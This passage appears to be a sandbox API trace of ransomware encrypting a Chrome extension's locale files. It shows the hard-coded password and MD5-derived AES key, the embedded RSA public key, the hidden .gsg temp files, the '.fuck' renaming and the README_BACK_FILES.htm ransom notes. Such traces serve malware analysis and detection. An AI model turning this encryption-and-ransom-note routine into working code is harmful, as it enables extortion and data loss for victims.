[0249.242] AreFileApisANSI () returned 1 [0249.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.242] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.243] GetFileType (hFile=0x5d54) returned 0x1 [0249.243] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.244] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.244] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.245] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.245] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.245] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.245] GetLastError () returned 0x0 [0249.245] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json")) returned 0x20 [0249.246] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0249.246] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.247] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.247] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.248] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.250] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.250] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.250] CryptHashData (hHash=0x2938978, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.250] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.250] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.251] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.251] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ecc8) returned 1 [0249.251] CryptImportPublicKeyInfo (in: hCryptProv=0x293ecc8, dwCertEncodingType=0x1, pInfo=0x29337d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933800*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933808*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937638) returned 1 [0249.252] CryptEncrypt (in: hKey=0x2937638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.252] CryptEncrypt (in: hKey=0x2937638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e5e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e5e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.252] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293e5e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e5e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.253] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd1, lpOverlapped=0x0) returned 1 [0249.254] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.255] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.255] CloseHandle (hObject=0x5d58) returned 1 [0249.255] CloseHandle (hObject=0x5d5c) returned 1 [0249.255] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0249.259] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0249.260] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.gsg")) returned 1 [0249.261] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.fuck")) returned 1 [0249.262] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.262] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.262] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.262] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.262] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.262] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0249.262] AreFileApisANSI () returned 1 [0249.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.262] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.263] GetFileType (hFile=0x5d54) returned 0x1 [0249.263] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.264] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.264] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.264] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.264] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.264] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.264] GetLastError () returned 0x0 [0249.264] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json")) returned 0x20 [0249.264] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0249.265] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.265] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.266] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.266] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.268] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.268] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.268] CryptHashData (hHash=0x2938978, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.269] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937778) returned 1 [0249.269] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.269] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.269] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293edd8) returned 1 [0249.269] CryptImportPublicKeyInfo (in: hCryptProv=0x293edd8, dwCertEncodingType=0x1, pInfo=0x2931f70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931fa0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931fa8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937938) returned 1 [0249.269] CryptEncrypt (in: hKey=0x2937938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.269] CryptEncrypt (in: hKey=0x2937938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f108*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f108*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.269] WriteFile (in: hFile=0x5d58, lpBuffer=0x293f108*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f108*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.270] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0249.271] CryptEncrypt (in: hKey=0x2937778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.272] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.272] CloseHandle (hObject=0x5d5c) returned 1 [0249.272] CloseHandle (hObject=0x5d58) returned 1 [0249.272] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0249.274] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0249.275] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.gsg")) returned 1 [0249.276] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.fuck")) returned 1 [0249.276] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.277] CryptDestroyKey (hKey=0x2937778) returned 1 [0249.277] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.277] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.277] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.277] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0249.277] AreFileApisANSI () returned 1 [0249.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.277] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.277] GetFileType (hFile=0x5d54) returned 0x1 [0249.278] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.278] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.279] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.279] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.279] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.279] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.279] GetLastError () returned 0x0 [0249.279] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json")) returned 0x20 [0249.280] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0249.280] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.280] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.281] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.281] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.283] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.283] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.283] CryptHashData (hHash=0x2938978, pbData=0x28cb670, 